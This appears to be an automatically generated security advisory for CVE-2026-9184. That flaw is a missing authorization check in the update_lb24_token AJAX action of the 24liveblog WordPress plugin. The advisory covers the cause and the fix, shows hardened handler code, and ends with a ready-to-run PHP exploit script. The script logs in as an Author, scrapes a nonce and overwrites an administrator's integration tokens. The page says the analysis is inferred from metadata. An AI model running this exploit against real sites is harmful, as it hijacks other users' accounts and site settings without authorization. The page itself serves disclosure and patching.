Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : June 24, 2026

CVE-2026-9184: 24liveblog <= 2.2 Missing Authorization to Authenticated (Author+) Settings Modification via update_lb24_token AJAX action PoC, Patch Analysis & Rule

CVE ID CVE-2026-9184
Plugin 24liveblog
Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 2.2
Patched Version
Disclosed June 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9184 (metadata-based):

This vulnerability allows authenticated attackers with Author-level access to modify sensitive settings in the 24liveblog plugin (versions up to 2.2) via the update_lb24_token AJAX function. The CVSS score is 4.3 (Medium) with a CWE-862 (Missing Authorization) classification.

Root Cause: The update_lb24_token() AJAX handler only verifies a nonce (lb24) that is generated and localized to any user with block editor access. It does not perform any capability check or verify that the user_id parameter matches the requesting user. Atomic Edge analysis infers from the CWE and description that the vulnerable code likely registers the AJAX action with wp_ajax_* for authenticated users but omits the current_user_can() check and fails to validate user_id against get_current_user_id(). This is a classic missing authorization pattern where nonce existence is mistaken for authorization.

Exploitation: An attacker with an Author-level account (or higher) on the WordPress site must first load a page that includes the block editor interface to obtain the lb24 nonce. The nonce is typically exposed via a localized script variable or a hidden input field. Once the nonce is acquired, the attacker sends a POST request to /wp-admin/admin-ajax.php with action=update_lb24_token, nonce=lb24, user_id=TARGET_USER_ID (any valid user ID, such as an administrator), lb24_token=attacker_value, lb24_uid=attacker_value, lb24_refresh_token=attacker_value, and lb24_uname=attacker_value. The handler will overwrite the corresponding user meta for the targeted user and also update site-wide options, hijacking the integration with the 24liveblog service.

Remediation: The fix must add a capability check (e.g., current_user_can('edit_posts') or a more restrictive capability) to the update_lb24_token() function before processing the request. Additionally, the handler should verify that the supplied user_id belongs to the current user using check_admin_referer() or by comparing user_id against get_current_user_id(). Atomic Edge analysis recommends that the plugin also implement a dedicated admin page with proper capability checks for managing the 24liveblog integration tokens rather than exposing this via an AJAX endpoint that relies solely on a nonce.
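The following is an added illustration of the pattern described in the Root Cause and Remediation sections above; it is not the 24liveblog plugin's code, and the nonce action string, option key and meta keys are assumptions chosen to mirror the advisory.

```php
<?php
// Added example, not the 24liveblog plugin's code. The nonce action string,
// option key and meta keys are assumptions that mirror the advisory text.

// Vulnerable pattern: the nonce proves only that the request came from a page
// that localized it (any block-editor user), not that the caller may act on
// the supplied user_id or on site-wide options.
function lb24_update_token_vulnerable() {
    check_ajax_referer( 'lb24_nonce_action', 'lb24' ); // nonce check only
    $user_id = (int) $_POST['user_id'];                 // caller-chosen target
    update_user_meta( $user_id, 'lb24_token', sanitize_text_field( wp_unslash( $_POST['lb24_token'] ) ) );
    update_option( 'lb24_uid', sanitize_text_field( wp_unslash( $_POST['lb24_uid'] ) ) );
    wp_send_json_success();
}

// Hardened pattern: nonce for CSRF, capability for authorization, and every
// write bound to the session user instead of a caller-supplied user_id.
function lb24_update_token_hardened() {
    check_ajax_referer( 'lb24_nonce_action', 'lb24' );

    // Capability gate. Authors already hold edit_posts, so this alone does not
    // stop the Author-level attacker; the ownership check below does.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // wp_send_json_error() exits
    }

    // Ownership: the only user whose meta may change is the current user.
    $user_id = get_current_user_id();
    if ( isset( $_POST['user_id'] ) && (int) $_POST['user_id'] !== $user_id ) {
        wp_send_json_error( 'user_id does not match the current user', 403 );
    }

    $token = isset( $_POST['lb24_token'] ) ? sanitize_text_field( wp_unslash( $_POST['lb24_token'] ) ) : '';
    update_user_meta( $user_id, 'lb24_token', $token );

    // Site-wide settings need a site-wide capability, not a post-editing one.
    if ( isset( $_POST['lb24_uid'] ) ) {
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'site-wide settings require manage_options', 403 );
        }
        update_option( 'lb24_uid', sanitize_text_field( wp_unslash( $_POST['lb24_uid'] ) ) );
    }
    wp_send_json_success();
}

// Only the hardened handler is registered; the vulnerable one is shown for contrast.
add_action( 'wp_ajax_update_lb24_token', 'lb24_update_token_hardened' );
```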

Impact: Attackers can overwrite the live blog integration tokens and user IDs for any user, including administrators. This allows them to hijack the plugin’s connection to the 24liveblog service, potentially replacing the legitimate blog content with malicious content from an attacker-controlled 24liveblog account. The site-wide options are also affected, making this a low-integrity impact (data modification) with no confidentiality or availability impact.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9184 - 24liveblog <= 2.2 - Missing Authorization to Authenticated (Author+) Settings Modification via update_lb24_token AJAX action

// IMPORTANT: This PoC requires an authenticated session cookie from an Author-level account or higher.
// The attacker must first obtain a valid lb24 nonce by loading a page that includes the block editor
// (e.g., editing a post). The nonce is typically exposed in a JavaScript variable or hidden field.

// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site URL
$username = 'attacker';              // Change this to an Author-level or higher account
$password = 'password';              // Change this to the account password
$target_user_id = 1;                 // Target user ID (e.g., admin) to overwrite tokens for

// Step 1: Login to WordPress to get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);
curl_close($ch);

// Step 2: Load the block editor to obtain the lb24 nonce
$editor_url = $target_url . '/wp-admin/post-new.php?post_type=post';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $editor_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$editor_response = curl_exec($ch);
curl_close($ch);

// Extract the lb24 nonce from the JavaScript window.lb24 object
// The nonce is typically in a script tag like: window.lb24 = {...}; or similar
$nonce = '';
if (preg_match('/var\s+lb24\s*=\s*\{[^}]*nonce[:\s]*"([^"]+)"/i', $editor_response, $matches)) {
    $nonce = $matches[1];
} elseif (preg_match('/"lb24_nonce"\s*:\s*"([^"]+)"/i', $editor_response, $matches)) {
    $nonce = $matches[1];
} elseif (preg_match('/lb24.*nonce[^:]*:[^"\']*["\']?([a-f0-9]+)["\']?/i', $editor_response, $matches)) {
    $nonce = $matches[1];
}

if (empty($nonce)) {
    die("[-] Could not extract lb24 nonce. The attacker must manually obtain it from the page source.\n");
}

echo "[+] Extracted lb24 nonce: $nonce\n";

// Step 3: Exploit the vulnerability to overwrite user meta of the target user
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = [
    'action' => 'update_lb24_token',
    'lb24' => $nonce,
    'user_id' => $target_user_id,
    'lb24_token' => 'attacker_controlled_token_' . time(),
    'lb24_uid' => 'attacker_uid_' . time(),
    'lb24_refresh_token' => 'attacker_refresh_' . time(),
    'lb24_uname' => 'attacker_username'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$exploit_response = curl_exec($ch);
curl_close($ch);

echo "[+] Exploit response: " . substr($exploit_response, 0, 500) . "\n";
echo "[+] Tokens for user ID $target_user_id have been overwritten with attacker-controlled values.\n";

// Clean up temporary cookie file
unlink('/tmp/cookies.txt');
